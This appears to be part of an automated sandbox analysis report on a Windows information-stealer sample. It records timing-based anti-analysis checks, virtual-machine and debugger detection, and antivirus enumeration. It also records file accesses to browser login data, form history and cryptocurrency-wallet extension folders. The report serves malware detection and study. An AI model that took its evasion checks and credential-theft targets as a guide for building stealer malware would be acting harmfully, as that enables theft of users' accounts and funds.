        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3BD8 second address: 5ED3BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3BDC second address: 5ED3C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jng 00007F48A0C1C536h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jns 00007F48A0C1C547h 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED3C12 second address: 5ED3C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4726 second address: 5ED4740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F48A0C1C542h 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4740 second address: 5ED4746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4746 second address: 5ED474A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED48BD second address: 5ED48D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED499C second address: 5ED49BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F48A0C1C542h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED49BB second address: 5ED49BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4DCF second address: 5ED4DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F48A0C1C536h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4DD9 second address: 5ED4E18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007F48A0C206DCh 0x00000010 jnl 00007F48A0C206D6h 0x00000016 push edx 0x00000017 je 00007F48A0C206D6h 0x0000001d pop edx 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+122D2C96h], ecx 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push ecx 0x00000029 je 00007F48A0C206D6h 0x0000002f pop ecx 0x00000030 jne 00007F48A0C206D8h 0x00000036 popad 0x00000037 push eax 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED4E18 second address: 5ED4E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED709C second address: 5ED70A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED79D3 second address: 5ED7A19 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F48A0C1C542h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F48A0C1C542h 0x00000011 je 00007F48A0C1C53Ch 0x00000017 jne 00007F48A0C1C536h 0x0000001d nop 0x0000001e mov edi, dword ptr [ebp+122D2C07h] 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D270Ch], ebx 0x0000002c push 00000000h 0x0000002e mov esi, dword ptr [ebp+122D3374h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED8E12 second address: 5ED8E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED8E16 second address: 5ED8E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED8E24 second address: 5ED8E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED8E28 second address: 5ED8E2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED8E2E second address: 5ED8EB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F48A0C206D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx edi, di 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F48A0C206D8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 clc 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007F48A0C206D8h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000015h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 mov esi, dword ptr [ebp+122D3C42h] 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jno 00007F48A0C206D8h 0x0000006f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED98E2 second address: 5ED98F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F48A0C1C541h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDA350 second address: 5EDA375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F48A0C206DBh 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F48A0C206DEh 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED9612 second address: 5ED9616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDCE51 second address: 5EDCE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDCF14 second address: 5EDCF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F48A0C1C536h 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDDFB6 second address: 5EDDFDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F48A0C206E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F48A0C206D6h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDDFDB second address: 5EDDFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 63CA9A instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 63CB44 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7DD493 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7DB9CE instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 63CAA3 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D1DEFE instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5ED24FC instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F598A5 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0059AD57 rdtsc 3_3_0059AD57
        Source: C:\Users\user\Desktop\file.exe TID: 2892Thread sleep time: -32016s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 4136Thread sleep time: -30015s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 1648Thread sleep time: -32000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 4472Thread sleep time: -30015s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 6816Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 6188Thread sleep time: -30015s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 720Thread sleep time: -44022s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 6312Thread sleep time: -34017s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 4716Thread sleep time: -38019s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: file.exe, 00000003.00000002.1737216137.0000000005EA8000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.1733342708.00000000007BB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
        Source: file.exe, 00000003.00000003.1641038627.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000507000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.000000000053F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: file.exe, 00000003.00000002.1729267093.00000000005B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
        Source: file.exe, 00000003.00000003.1380827776.000000000534E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
        Source: file.exe, 00000003.00000003.1641038627.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.000000000053F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnSp=
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
        Source: file.exe, 00000003.00000002.1729267093.00000000005B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
        Source: file.exe, 00000003.00000002.1737216137.0000000005EA8000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.1733342708.00000000007BB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
        Source: file.exe, 00000003.00000003.1380891490.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0059AD57 rdtsc 3_3_0059AD57
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: file.exe, 00000003.00000002.1737216137.0000000005EA8000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: file.exe, 00000003.00000002.1733342708.00000000007BB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: s4Program Manager
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: file.exe, file.exe, 00000003.00000003.1551909118.000000000530F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1466832424.000000000530F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1484744056.0000000005301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6908, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: file.exe, 00000003.00000003.1433259876.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
        Source: file.exe, 00000003.00000003.1433259876.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash
        Source: file.exe, 00000003.00000003.1433296443.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
        Source: file.exe, 00000003.00000003.1403898047.0000000005306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
        Source: file.exe, 00000003.00000003.1433296443.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: file.exe, 00000003.00000003.1433259876.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
